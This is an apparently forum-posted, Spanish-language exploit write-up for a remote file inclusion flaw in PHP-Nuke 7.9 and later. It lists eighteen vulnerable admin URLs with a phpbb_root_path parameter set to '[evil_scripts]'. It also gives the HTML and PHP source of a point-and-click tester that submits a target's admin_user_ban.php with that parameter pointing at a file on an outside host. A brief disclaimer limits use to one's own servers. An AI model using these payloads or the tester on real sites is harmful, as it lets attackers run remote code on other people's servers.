Por eso nunca me gustaron los PHP Nuke 

http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]

Fuente:
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1015/exploit.html

Prueva online:
http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-RFI/

Index.html:

<style type="text/css">
<!--
body {
	background-image: url(fondo.gif);
}
-->
</style><center>
  <h2><u>Prueva del concepto para la inclusi&oacute;n remota de archivos en PHP-Nuke 7.9 o posterior</u></h2>
  <p align="left">&nbsp;</p>
  </center>
<form method="GET" action="index.php">
  <p><b>Host vulnerable:</b>
    <input type="text" name="url">
    <input type="submit" value="Probar">
  Ej: http://host.com/nuke </p>
</form>
 
<p>Si te ha resultado bi&eacute;n la prueva o tienes alg&uacute;n problema por favor haz tus comentarios desde <a href="http://whk.sitehacking.net/?p=81">http://whk.sitehacking.net/?p=81</a></p>
<p>NOTA: el uso de esta prueva es &uacute;nicamente para crear pruevas en sus propios servidores.</p>
<p>&nbsp;</p>
<p><a href="http://whk.sitehacking.net/">WHK.SiteHacking.Net</a></p>

index.php

<style type="text/css">
<!--
body {
	background-image: url(fondo.gif);
}
-->
</style>
<?
$URL_SF = $_GET["url"];
$URL = htmlspecialchars("$URL_SF", ENT_QUOTES);
 
 
if($URL == ''){
   echo '<META HTTP-EQUIV="refresh" content="0;URL=http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-RFI/">';
}
else {
 
echo '<form method="get" action="' . $URL . '/Forums/admin/admin_user_ban.php?phpbb_root_path=http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-RFI/bat.png?vrb=x">';
echo '<input type="submit" value="Testear"';
echo '</FORM>';
 
}
?>
 

see..


En phpbb hay muchos y en módulos también.